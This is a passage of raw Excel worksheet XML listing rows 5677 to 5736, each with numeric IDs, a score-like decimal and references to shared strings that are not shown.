      <c r="G5677" t="s">
        <v>11230</v>
      </c>
      <c r="H5677" t="s">
        <v>11231</v>
      </c>
    </row>
    <row r="5678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5678" s="1">
        <v>5676</v>
      </c>
      <c r="B5678">
        <v>1046</v>
      </c>
      <c r="C5678">
        <v>1046</v>
      </c>
      <c r="D5678">
        <v>3</v>
      </c>
      <c r="E5678">
        <v>0.98600000143051147</v>
      </c>
      <c r="F5678" t="s">
        <v>10120</v>
      </c>
      <c r="G5678" t="s">
        <v>11232</v>
      </c>
      <c r="H5678" t="s">
        <v>11233</v>
      </c>
    </row>
    <row r="5679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5679" s="1">
        <v>5677</v>
      </c>
      <c r="B5679">
        <v>2927</v>
      </c>
      <c r="C5679">
        <v>2927</v>
      </c>
      <c r="D5679">
        <v>3</v>
      </c>
      <c r="E5679">
        <v>0.99360001087188721</v>
      </c>
      <c r="F5679" t="s">
        <v>10120</v>
      </c>
      <c r="G5679" t="s">
        <v>11234</v>
      </c>
      <c r="H5679" t="s">
        <v>11235</v>
      </c>
    </row>
    <row r="5680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5680" s="1">
        <v>5678</v>
      </c>
      <c r="B5680">
        <v>2933</v>
      </c>
      <c r="C5680">
        <v>2933</v>
      </c>
      <c r="D5680">
        <v>3</v>
      </c>
      <c r="E5680">
        <v>0.70590001344680786</v>
      </c>
      <c r="F5680" t="s">
        <v>10120</v>
      </c>
      <c r="G5680" t="s">
        <v>11236</v>
      </c>
      <c r="H5680" t="s">
        <v>11237</v>
      </c>
    </row>
    <row r="5681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5681" s="1">
        <v>5679</v>
      </c>
      <c r="B5681">
        <v>2857</v>
      </c>
      <c r="C5681">
        <v>2857</v>
      </c>
      <c r="D5681">
        <v>3</v>
      </c>
      <c r="E5681">
        <v>0.76660001277923584</v>
      </c>
      <c r="F5681" t="s">
        <v>10120</v>
      </c>
      <c r="G5681" t="s">
        <v>11238</v>
      </c>
      <c r="H5681" t="s">
        <v>11239</v>
      </c>
    </row>
    <row r="5682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5682" s="1">
        <v>5680</v>
      </c>
      <c r="B5682">
        <v>2935</v>
      </c>
      <c r="C5682">
        <v>2935</v>
      </c>
      <c r="D5682">
        <v>3</v>
      </c>
      <c r="E5682">
        <v>0.55339998006820679</v>
      </c>
      <c r="F5682" t="s">
        <v>10120</v>
      </c>
      <c r="G5682" t="s">
        <v>11240</v>
      </c>
      <c r="H5682" t="s">
        <v>11241</v>
      </c>
    </row>
    <row r="5683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5683" s="1">
        <v>5681</v>
      </c>
      <c r="B5683">
        <v>2856</v>
      </c>
      <c r="C5683">
        <v>2856</v>
      </c>
      <c r="D5683">
        <v>3</v>
      </c>
      <c r="E5683">
        <v>0.75110000371932983</v>
      </c>
      <c r="F5683" t="s">
        <v>10120</v>
      </c>
      <c r="G5683" t="s">
        <v>11242</v>
      </c>
      <c r="H5683" t="s">
        <v>11243</v>
      </c>
    </row>
    <row r="5684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5684" s="1">
        <v>5682</v>
      </c>
      <c r="B5684">
        <v>2852</v>
      </c>
      <c r="C5684">
        <v>2852</v>
      </c>
      <c r="D5684">
        <v>3</v>
      </c>
      <c r="E5684">
        <v>0.4406999945640564</v>
      </c>
      <c r="F5684" t="s">
        <v>10120</v>
      </c>
      <c r="G5684" t="s">
        <v>11244</v>
      </c>
      <c r="H5684" t="s">
        <v>11245</v>
      </c>
    </row>
    <row r="5685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5685" s="1">
        <v>5683</v>
      </c>
      <c r="B5685">
        <v>1108</v>
      </c>
      <c r="C5685">
        <v>1108</v>
      </c>
      <c r="D5685">
        <v>3</v>
      </c>
      <c r="E5685">
        <v>0.94739997386932373</v>
      </c>
      <c r="F5685" t="s">
        <v>10120</v>
      </c>
      <c r="G5685" t="s">
        <v>11246</v>
      </c>
      <c r="H5685" t="s">
        <v>11247</v>
      </c>
    </row>
    <row r="5686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5686" s="1">
        <v>5684</v>
      </c>
      <c r="B5686">
        <v>1104</v>
      </c>
      <c r="C5686">
        <v>1104</v>
      </c>
      <c r="D5686">
        <v>3</v>
      </c>
      <c r="E5686">
        <v>0.89550000429153442</v>
      </c>
      <c r="F5686" t="s">
        <v>10120</v>
      </c>
      <c r="G5686" t="s">
        <v>11248</v>
      </c>
      <c r="H5686" t="s">
        <v>11249</v>
      </c>
    </row>
    <row r="5687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5687" s="1">
        <v>5685</v>
      </c>
      <c r="B5687">
        <v>1102</v>
      </c>
      <c r="C5687">
        <v>1102</v>
      </c>
      <c r="D5687">
        <v>3</v>
      </c>
      <c r="E5687">
        <v>0.89889997243881226</v>
      </c>
      <c r="F5687" t="s">
        <v>10120</v>
      </c>
      <c r="G5687" t="s">
        <v>11250</v>
      </c>
      <c r="H5687" t="s">
        <v>11251</v>
      </c>
    </row>
    <row r="5688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5688" s="1">
        <v>5686</v>
      </c>
      <c r="B5688">
        <v>2791</v>
      </c>
      <c r="C5688">
        <v>2791</v>
      </c>
      <c r="D5688">
        <v>3</v>
      </c>
      <c r="E5688">
        <v>0.66250002384185791</v>
      </c>
      <c r="F5688" t="s">
        <v>10120</v>
      </c>
      <c r="G5688" t="s">
        <v>11252</v>
      </c>
      <c r="H5688" t="s">
        <v>11253</v>
      </c>
    </row>
    <row r="5689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5689" s="1">
        <v>5687</v>
      </c>
      <c r="B5689">
        <v>1093</v>
      </c>
      <c r="C5689">
        <v>1093</v>
      </c>
      <c r="D5689">
        <v>3</v>
      </c>
      <c r="E5689">
        <v>0.80739998817443848</v>
      </c>
      <c r="F5689" t="s">
        <v>10120</v>
      </c>
      <c r="G5689" t="s">
        <v>11254</v>
      </c>
      <c r="H5689" t="s">
        <v>11255</v>
      </c>
    </row>
    <row r="5690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5690" s="1">
        <v>5688</v>
      </c>
      <c r="B5690">
        <v>2799</v>
      </c>
      <c r="C5690">
        <v>2799</v>
      </c>
      <c r="D5690">
        <v>3</v>
      </c>
      <c r="E5690">
        <v>0.7929999828338623</v>
      </c>
      <c r="F5690" t="s">
        <v>10120</v>
      </c>
      <c r="G5690" t="s">
        <v>11256</v>
      </c>
      <c r="H5690" t="s">
        <v>11257</v>
      </c>
    </row>
    <row r="5691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5691" s="1">
        <v>5689</v>
      </c>
      <c r="B5691">
        <v>2802</v>
      </c>
      <c r="C5691">
        <v>2802</v>
      </c>
      <c r="D5691">
        <v>3</v>
      </c>
      <c r="E5691">
        <v>0.85989999771118164</v>
      </c>
      <c r="F5691" t="s">
        <v>10120</v>
      </c>
      <c r="G5691" t="s">
        <v>11258</v>
      </c>
      <c r="H5691" t="s">
        <v>11259</v>
      </c>
    </row>
    <row r="5692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5692" s="1">
        <v>5690</v>
      </c>
      <c r="B5692">
        <v>2803</v>
      </c>
      <c r="C5692">
        <v>2803</v>
      </c>
      <c r="D5692">
        <v>3</v>
      </c>
      <c r="E5692">
        <v>0.73570001125335693</v>
      </c>
      <c r="F5692" t="s">
        <v>10120</v>
      </c>
      <c r="G5692" t="s">
        <v>11260</v>
      </c>
      <c r="H5692" t="s">
        <v>11261</v>
      </c>
    </row>
    <row r="5693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5693" s="1">
        <v>5691</v>
      </c>
      <c r="B5693">
        <v>2804</v>
      </c>
      <c r="C5693">
        <v>2804</v>
      </c>
      <c r="D5693">
        <v>3</v>
      </c>
      <c r="E5693">
        <v>0.58609998226165771</v>
      </c>
      <c r="F5693" t="s">
        <v>10120</v>
      </c>
      <c r="G5693" t="s">
        <v>11262</v>
      </c>
      <c r="H5693" t="s">
        <v>11263</v>
      </c>
    </row>
    <row r="5694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5694" s="1">
        <v>5692</v>
      </c>
      <c r="B5694">
        <v>1092</v>
      </c>
      <c r="C5694">
        <v>1092</v>
      </c>
      <c r="D5694">
        <v>3</v>
      </c>
      <c r="E5694">
        <v>0.51999998092651367</v>
      </c>
      <c r="F5694" t="s">
        <v>10120</v>
      </c>
      <c r="G5694" t="s">
        <v>11264</v>
      </c>
      <c r="H5694" t="s">
        <v>11265</v>
      </c>
    </row>
    <row r="5695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5695" s="1">
        <v>5693</v>
      </c>
      <c r="B5695">
        <v>2831</v>
      </c>
      <c r="C5695">
        <v>2831</v>
      </c>
      <c r="D5695">
        <v>3</v>
      </c>
      <c r="E5695">
        <v>0.75309997797012329</v>
      </c>
      <c r="F5695" t="s">
        <v>10120</v>
      </c>
      <c r="G5695" t="s">
        <v>11266</v>
      </c>
      <c r="H5695" t="s">
        <v>11267</v>
      </c>
    </row>
    <row r="5696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5696" s="1">
        <v>5694</v>
      </c>
      <c r="B5696">
        <v>1090</v>
      </c>
      <c r="C5696">
        <v>1090</v>
      </c>
      <c r="D5696">
        <v>3</v>
      </c>
      <c r="E5696">
        <v>0.46399998664855963</v>
      </c>
      <c r="F5696" t="s">
        <v>10120</v>
      </c>
      <c r="G5696" t="s">
        <v>11268</v>
      </c>
      <c r="H5696" t="s">
        <v>11269</v>
      </c>
    </row>
    <row r="5697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5697" s="1">
        <v>5695</v>
      </c>
      <c r="B5697">
        <v>2837</v>
      </c>
      <c r="C5697">
        <v>2837</v>
      </c>
      <c r="D5697">
        <v>3</v>
      </c>
      <c r="E5697">
        <v>0.72369998693466187</v>
      </c>
      <c r="F5697" t="s">
        <v>10120</v>
      </c>
      <c r="G5697" t="s">
        <v>11270</v>
      </c>
      <c r="H5697" t="s">
        <v>11271</v>
      </c>
    </row>
    <row r="5698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5698" s="1">
        <v>5696</v>
      </c>
      <c r="B5698">
        <v>2841</v>
      </c>
      <c r="C5698">
        <v>2841</v>
      </c>
      <c r="D5698">
        <v>3</v>
      </c>
      <c r="E5698">
        <v>0.99639999866485596</v>
      </c>
      <c r="F5698" t="s">
        <v>10120</v>
      </c>
      <c r="G5698" t="s">
        <v>11272</v>
      </c>
      <c r="H5698" t="s">
        <v>11273</v>
      </c>
    </row>
    <row r="5699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5699" s="1">
        <v>5697</v>
      </c>
      <c r="B5699">
        <v>2842</v>
      </c>
      <c r="C5699">
        <v>2842</v>
      </c>
      <c r="D5699">
        <v>3</v>
      </c>
      <c r="E5699">
        <v>0.44740000367164612</v>
      </c>
      <c r="F5699" t="s">
        <v>10120</v>
      </c>
      <c r="G5699" t="s">
        <v>11274</v>
      </c>
      <c r="H5699" t="s">
        <v>11275</v>
      </c>
    </row>
    <row r="5700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5700" s="1">
        <v>5698</v>
      </c>
      <c r="B5700">
        <v>1089</v>
      </c>
      <c r="C5700">
        <v>1089</v>
      </c>
      <c r="D5700">
        <v>3</v>
      </c>
      <c r="E5700">
        <v>0.53789997100830078</v>
      </c>
      <c r="F5700" t="s">
        <v>10120</v>
      </c>
      <c r="G5700" t="s">
        <v>11276</v>
      </c>
      <c r="H5700" t="s">
        <v>11277</v>
      </c>
    </row>
    <row r="5701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5701" s="1">
        <v>5699</v>
      </c>
      <c r="B5701">
        <v>1087</v>
      </c>
      <c r="C5701">
        <v>1087</v>
      </c>
      <c r="D5701">
        <v>3</v>
      </c>
      <c r="E5701">
        <v>0.8880000114440918</v>
      </c>
      <c r="F5701" t="s">
        <v>10120</v>
      </c>
      <c r="G5701" t="s">
        <v>11278</v>
      </c>
      <c r="H5701" t="s">
        <v>11279</v>
      </c>
    </row>
    <row r="5702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5702" s="1">
        <v>5700</v>
      </c>
      <c r="B5702">
        <v>2855</v>
      </c>
      <c r="C5702">
        <v>2855</v>
      </c>
      <c r="D5702">
        <v>3</v>
      </c>
      <c r="E5702">
        <v>0.48870000243186951</v>
      </c>
      <c r="F5702" t="s">
        <v>10120</v>
      </c>
      <c r="G5702" t="s">
        <v>11280</v>
      </c>
      <c r="H5702" t="s">
        <v>11281</v>
      </c>
    </row>
    <row r="5703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5703" s="1">
        <v>5701</v>
      </c>
      <c r="B5703">
        <v>2938</v>
      </c>
      <c r="C5703">
        <v>2938</v>
      </c>
      <c r="D5703">
        <v>3</v>
      </c>
      <c r="E5703">
        <v>0.94150000810623169</v>
      </c>
      <c r="F5703" t="s">
        <v>10120</v>
      </c>
      <c r="G5703" t="s">
        <v>11282</v>
      </c>
      <c r="H5703" t="s">
        <v>11283</v>
      </c>
    </row>
    <row r="5704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5704" s="1">
        <v>5702</v>
      </c>
      <c r="B5704">
        <v>2939</v>
      </c>
      <c r="C5704">
        <v>2939</v>
      </c>
      <c r="D5704">
        <v>3</v>
      </c>
      <c r="E5704">
        <v>0.99860000610351563</v>
      </c>
      <c r="F5704" t="s">
        <v>10120</v>
      </c>
      <c r="G5704" t="s">
        <v>11284</v>
      </c>
      <c r="H5704" t="s">
        <v>11285</v>
      </c>
    </row>
    <row r="5705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5705" s="1">
        <v>5703</v>
      </c>
      <c r="B5705">
        <v>2943</v>
      </c>
      <c r="C5705">
        <v>2943</v>
      </c>
      <c r="D5705">
        <v>3</v>
      </c>
      <c r="E5705">
        <v>0.87290000915527344</v>
      </c>
      <c r="F5705" t="s">
        <v>10120</v>
      </c>
      <c r="G5705" t="s">
        <v>11286</v>
      </c>
      <c r="H5705" t="s">
        <v>11287</v>
      </c>
    </row>
    <row r="5706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5706" s="1">
        <v>5704</v>
      </c>
      <c r="B5706">
        <v>1008</v>
      </c>
      <c r="C5706">
        <v>1008</v>
      </c>
      <c r="D5706">
        <v>3</v>
      </c>
      <c r="E5706">
        <v>0.56709998846054077</v>
      </c>
      <c r="F5706" t="s">
        <v>10120</v>
      </c>
      <c r="G5706" t="s">
        <v>11288</v>
      </c>
      <c r="H5706" t="s">
        <v>11289</v>
      </c>
    </row>
    <row r="5707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5707" s="1">
        <v>5705</v>
      </c>
      <c r="B5707">
        <v>2974</v>
      </c>
      <c r="C5707">
        <v>2974</v>
      </c>
      <c r="D5707">
        <v>3</v>
      </c>
      <c r="E5707">
        <v>0.45820000767707819</v>
      </c>
      <c r="F5707" t="s">
        <v>10120</v>
      </c>
      <c r="G5707" t="s">
        <v>11290</v>
      </c>
      <c r="H5707" t="s">
        <v>11291</v>
      </c>
    </row>
    <row r="5708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5708" s="1">
        <v>5706</v>
      </c>
      <c r="B5708">
        <v>2979</v>
      </c>
      <c r="C5708">
        <v>2979</v>
      </c>
      <c r="D5708">
        <v>3</v>
      </c>
      <c r="E5708">
        <v>0.72390002012252808</v>
      </c>
      <c r="F5708" t="s">
        <v>10120</v>
      </c>
      <c r="G5708" t="s">
        <v>11292</v>
      </c>
      <c r="H5708" t="s">
        <v>11293</v>
      </c>
    </row>
    <row r="5709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5709" s="1">
        <v>5707</v>
      </c>
      <c r="B5709">
        <v>2980</v>
      </c>
      <c r="C5709">
        <v>2980</v>
      </c>
      <c r="D5709">
        <v>3</v>
      </c>
      <c r="E5709">
        <v>0.75540000200271606</v>
      </c>
      <c r="F5709" t="s">
        <v>10120</v>
      </c>
      <c r="G5709" t="s">
        <v>11294</v>
      </c>
      <c r="H5709" t="s">
        <v>11295</v>
      </c>
    </row>
    <row r="5710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5710" s="1">
        <v>5708</v>
      </c>
      <c r="B5710">
        <v>2986</v>
      </c>
      <c r="C5710">
        <v>2986</v>
      </c>
      <c r="D5710">
        <v>3</v>
      </c>
      <c r="E5710">
        <v>0.71899998188018799</v>
      </c>
      <c r="F5710" t="s">
        <v>10120</v>
      </c>
      <c r="G5710" t="s">
        <v>11296</v>
      </c>
      <c r="H5710" t="s">
        <v>11297</v>
      </c>
    </row>
    <row r="5711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5711" s="1">
        <v>5709</v>
      </c>
      <c r="B5711">
        <v>1002</v>
      </c>
      <c r="C5711">
        <v>1002</v>
      </c>
      <c r="D5711">
        <v>3</v>
      </c>
      <c r="E5711">
        <v>0.96249997615814209</v>
      </c>
      <c r="F5711" t="s">
        <v>10120</v>
      </c>
      <c r="G5711" t="s">
        <v>11298</v>
      </c>
      <c r="H5711" t="s">
        <v>11299</v>
      </c>
    </row>
    <row r="5712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5712" s="1">
        <v>5710</v>
      </c>
      <c r="B5712">
        <v>1001</v>
      </c>
      <c r="C5712">
        <v>1001</v>
      </c>
      <c r="D5712">
        <v>3</v>
      </c>
      <c r="E5712">
        <v>0.84780001640319824</v>
      </c>
      <c r="F5712" t="s">
        <v>10120</v>
      </c>
      <c r="G5712" t="s">
        <v>11300</v>
      </c>
      <c r="H5712" t="s">
        <v>11301</v>
      </c>
    </row>
    <row r="5713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5713" s="1">
        <v>5711</v>
      </c>
      <c r="B5713">
        <v>2992</v>
      </c>
      <c r="C5713">
        <v>2992</v>
      </c>
      <c r="D5713">
        <v>3</v>
      </c>
      <c r="E5713">
        <v>0.54629999399185181</v>
      </c>
      <c r="F5713" t="s">
        <v>10120</v>
      </c>
      <c r="G5713" t="s">
        <v>11302</v>
      </c>
      <c r="H5713" t="s">
        <v>11303</v>
      </c>
    </row>
    <row r="5714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5714" s="1">
        <v>5712</v>
      </c>
      <c r="B5714">
        <v>2994</v>
      </c>
      <c r="C5714">
        <v>2994</v>
      </c>
      <c r="D5714">
        <v>3</v>
      </c>
      <c r="E5714">
        <v>0.87199997901916504</v>
      </c>
      <c r="F5714" t="s">
        <v>10120</v>
      </c>
      <c r="G5714" t="s">
        <v>11304</v>
      </c>
      <c r="H5714" t="s">
        <v>11305</v>
      </c>
    </row>
    <row r="5715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5715" s="1">
        <v>5713</v>
      </c>
      <c r="B5715">
        <v>988</v>
      </c>
      <c r="C5715">
        <v>988</v>
      </c>
      <c r="D5715">
        <v>3</v>
      </c>
      <c r="E5715">
        <v>0.37590000033378601</v>
      </c>
      <c r="F5715" t="s">
        <v>10120</v>
      </c>
      <c r="G5715" t="s">
        <v>11306</v>
      </c>
      <c r="H5715" t="s">
        <v>11307</v>
      </c>
    </row>
    <row r="5716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5716" s="1">
        <v>5714</v>
      </c>
      <c r="B5716">
        <v>3004</v>
      </c>
      <c r="C5716">
        <v>3004</v>
      </c>
      <c r="D5716">
        <v>3</v>
      </c>
      <c r="E5716">
        <v>0.35580000281333918</v>
      </c>
      <c r="F5716" t="s">
        <v>10120</v>
      </c>
      <c r="G5716" t="s">
        <v>11308</v>
      </c>
      <c r="H5716" t="s">
        <v>11309</v>
      </c>
    </row>
    <row r="5717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5717" s="1">
        <v>5715</v>
      </c>
      <c r="B5717">
        <v>986</v>
      </c>
      <c r="C5717">
        <v>986</v>
      </c>
      <c r="D5717">
        <v>3</v>
      </c>
      <c r="E5717">
        <v>0.67199999094009399</v>
      </c>
      <c r="F5717" t="s">
        <v>10120</v>
      </c>
      <c r="G5717" t="s">
        <v>11310</v>
      </c>
      <c r="H5717" t="s">
        <v>11311</v>
      </c>
    </row>
    <row r="5718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5718" s="1">
        <v>5716</v>
      </c>
      <c r="B5718">
        <v>3017</v>
      </c>
      <c r="C5718">
        <v>3017</v>
      </c>
      <c r="D5718">
        <v>3</v>
      </c>
      <c r="E5718">
        <v>0.55349999666213989</v>
      </c>
      <c r="F5718" t="s">
        <v>10120</v>
      </c>
      <c r="G5718" t="s">
        <v>11312</v>
      </c>
      <c r="H5718" t="s">
        <v>11313</v>
      </c>
    </row>
    <row r="5719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5719" s="1">
        <v>5717</v>
      </c>
      <c r="B5719">
        <v>3018</v>
      </c>
      <c r="C5719">
        <v>3018</v>
      </c>
      <c r="D5719">
        <v>3</v>
      </c>
      <c r="E5719">
        <v>0.57160001993179321</v>
      </c>
      <c r="F5719" t="s">
        <v>10120</v>
      </c>
      <c r="G5719" t="s">
        <v>11314</v>
      </c>
      <c r="H5719" t="s">
        <v>11315</v>
      </c>
    </row>
    <row r="5720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5720" s="1">
        <v>5718</v>
      </c>
      <c r="B5720">
        <v>984</v>
      </c>
      <c r="C5720">
        <v>984</v>
      </c>
      <c r="D5720">
        <v>3</v>
      </c>
      <c r="E5720">
        <v>0.81929999589920044</v>
      </c>
      <c r="F5720" t="s">
        <v>10120</v>
      </c>
      <c r="G5720" t="s">
        <v>11316</v>
      </c>
      <c r="H5720" t="s">
        <v>11317</v>
      </c>
    </row>
    <row r="5721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5721" s="1">
        <v>5719</v>
      </c>
      <c r="B5721">
        <v>3026</v>
      </c>
      <c r="C5721">
        <v>3026</v>
      </c>
      <c r="D5721">
        <v>3</v>
      </c>
      <c r="E5721">
        <v>0.98360002040863037</v>
      </c>
      <c r="F5721" t="s">
        <v>10120</v>
      </c>
      <c r="G5721" t="s">
        <v>11318</v>
      </c>
      <c r="H5721" t="s">
        <v>11319</v>
      </c>
    </row>
    <row r="5722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5722" s="1">
        <v>5720</v>
      </c>
      <c r="B5722">
        <v>3027</v>
      </c>
      <c r="C5722">
        <v>3027</v>
      </c>
      <c r="D5722">
        <v>3</v>
      </c>
      <c r="E5722">
        <v>0.69940000772476196</v>
      </c>
      <c r="F5722" t="s">
        <v>10120</v>
      </c>
      <c r="G5722" t="s">
        <v>11320</v>
      </c>
      <c r="H5722" t="s">
        <v>11321</v>
      </c>
    </row>
    <row r="5723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5723" s="1">
        <v>5721</v>
      </c>
      <c r="B5723">
        <v>2966</v>
      </c>
      <c r="C5723">
        <v>2966</v>
      </c>
      <c r="D5723">
        <v>3</v>
      </c>
      <c r="E5723">
        <v>0.98059999942779541</v>
      </c>
      <c r="F5723" t="s">
        <v>10120</v>
      </c>
      <c r="G5723" t="s">
        <v>11322</v>
      </c>
      <c r="H5723" t="s">
        <v>11323</v>
      </c>
    </row>
    <row r="5724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5724" s="1">
        <v>5722</v>
      </c>
      <c r="B5724">
        <v>2961</v>
      </c>
      <c r="C5724">
        <v>2961</v>
      </c>
      <c r="D5724">
        <v>3</v>
      </c>
      <c r="E5724">
        <v>0.49009999632835388</v>
      </c>
      <c r="F5724" t="s">
        <v>10120</v>
      </c>
      <c r="G5724" t="s">
        <v>11324</v>
      </c>
      <c r="H5724" t="s">
        <v>11325</v>
      </c>
    </row>
    <row r="5725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5725" s="1">
        <v>5723</v>
      </c>
      <c r="B5725">
        <v>2960</v>
      </c>
      <c r="C5725">
        <v>2960</v>
      </c>
      <c r="D5725">
        <v>3</v>
      </c>
      <c r="E5725">
        <v>0.54210001230239868</v>
      </c>
      <c r="F5725" t="s">
        <v>10120</v>
      </c>
      <c r="G5725" t="s">
        <v>11326</v>
      </c>
      <c r="H5725" t="s">
        <v>11327</v>
      </c>
    </row>
    <row r="5726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5726" s="1">
        <v>5724</v>
      </c>
      <c r="B5726">
        <v>2959</v>
      </c>
      <c r="C5726">
        <v>2959</v>
      </c>
      <c r="D5726">
        <v>3</v>
      </c>
      <c r="E5726">
        <v>0.42239999771118159</v>
      </c>
      <c r="F5726" t="s">
        <v>10120</v>
      </c>
      <c r="G5726" t="s">
        <v>11328</v>
      </c>
      <c r="H5726" t="s">
        <v>11329</v>
      </c>
    </row>
    <row r="5727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5727" s="1">
        <v>5725</v>
      </c>
      <c r="B5727">
        <v>2946</v>
      </c>
      <c r="C5727">
        <v>2946</v>
      </c>
      <c r="D5727">
        <v>3</v>
      </c>
      <c r="E5727">
        <v>0.81139999628067017</v>
      </c>
      <c r="F5727" t="s">
        <v>10120</v>
      </c>
      <c r="G5727" t="s">
        <v>11330</v>
      </c>
      <c r="H5727" t="s">
        <v>11331</v>
      </c>
    </row>
    <row r="5728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5728" s="1">
        <v>5726</v>
      </c>
      <c r="B5728">
        <v>2950</v>
      </c>
      <c r="C5728">
        <v>2950</v>
      </c>
      <c r="D5728">
        <v>3</v>
      </c>
      <c r="E5728">
        <v>0.95810002088546753</v>
      </c>
      <c r="F5728" t="s">
        <v>10120</v>
      </c>
      <c r="G5728" t="s">
        <v>11332</v>
      </c>
      <c r="H5728" t="s">
        <v>11333</v>
      </c>
    </row>
    <row r="5729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5729" s="1">
        <v>5727</v>
      </c>
      <c r="B5729">
        <v>1038</v>
      </c>
      <c r="C5729">
        <v>1038</v>
      </c>
      <c r="D5729">
        <v>3</v>
      </c>
      <c r="E5729">
        <v>0.60379999876022339</v>
      </c>
      <c r="F5729" t="s">
        <v>10120</v>
      </c>
      <c r="G5729" t="s">
        <v>11334</v>
      </c>
      <c r="H5729" t="s">
        <v>11335</v>
      </c>
    </row>
    <row r="5730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5730" s="1">
        <v>5728</v>
      </c>
      <c r="B5730">
        <v>1036</v>
      </c>
      <c r="C5730">
        <v>1036</v>
      </c>
      <c r="D5730">
        <v>3</v>
      </c>
      <c r="E5730">
        <v>0.83149999380111694</v>
      </c>
      <c r="F5730" t="s">
        <v>10120</v>
      </c>
      <c r="G5730" t="s">
        <v>11336</v>
      </c>
      <c r="H5730" t="s">
        <v>11337</v>
      </c>
    </row>
    <row r="5731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5731" s="1">
        <v>5729</v>
      </c>
      <c r="B5731">
        <v>1035</v>
      </c>
      <c r="C5731">
        <v>1035</v>
      </c>
      <c r="D5731">
        <v>3</v>
      </c>
      <c r="E5731">
        <v>0.99910002946853638</v>
      </c>
      <c r="F5731" t="s">
        <v>10120</v>
      </c>
      <c r="G5731" t="s">
        <v>11338</v>
      </c>
      <c r="H5731" t="s">
        <v>11339</v>
      </c>
    </row>
    <row r="5732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5732" s="1">
        <v>5730</v>
      </c>
      <c r="B5732">
        <v>1033</v>
      </c>
      <c r="C5732">
        <v>1033</v>
      </c>
      <c r="D5732">
        <v>3</v>
      </c>
      <c r="E5732">
        <v>0.95179998874664307</v>
      </c>
      <c r="F5732" t="s">
        <v>10120</v>
      </c>
      <c r="G5732" t="s">
        <v>11340</v>
      </c>
      <c r="H5732" t="s">
        <v>11341</v>
      </c>
    </row>
    <row r="5733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5733" s="1">
        <v>5731</v>
      </c>
      <c r="B5733">
        <v>1032</v>
      </c>
      <c r="C5733">
        <v>1032</v>
      </c>
      <c r="D5733">
        <v>3</v>
      </c>
      <c r="E5733">
        <v>0.52079999446868896</v>
      </c>
      <c r="F5733" t="s">
        <v>10120</v>
      </c>
      <c r="G5733" t="s">
        <v>11342</v>
      </c>
      <c r="H5733" t="s">
        <v>11343</v>
      </c>
    </row>
    <row r="5734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5734" s="1">
        <v>5732</v>
      </c>
      <c r="B5734">
        <v>1031</v>
      </c>
      <c r="C5734">
        <v>1031</v>
      </c>
      <c r="D5734">
        <v>3</v>
      </c>
      <c r="E5734">
        <v>0.61330002546310425</v>
      </c>
      <c r="F5734" t="s">
        <v>10120</v>
      </c>
      <c r="G5734" t="s">
        <v>11344</v>
      </c>
      <c r="H5734" t="s">
        <v>11345</v>
      </c>
    </row>
    <row r="5735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5735" s="1">
        <v>5733</v>
      </c>
      <c r="B5735">
        <v>3358</v>
      </c>
      <c r="C5735">
        <v>3358</v>
      </c>
      <c r="D5735">
        <v>3</v>
      </c>
      <c r="E5735">
        <v>0.61890000104904175</v>
      </c>
      <c r="F5735" t="s">
        <v>10120</v>
      </c>
      <c r="G5735" t="s">
        <v>11346</v>
      </c>
      <c r="H5735" t="s">
        <v>11347</v>
      </c>
    </row>
    <row r="5736" spans="1:8" x14ac:dyDescent="0.45">
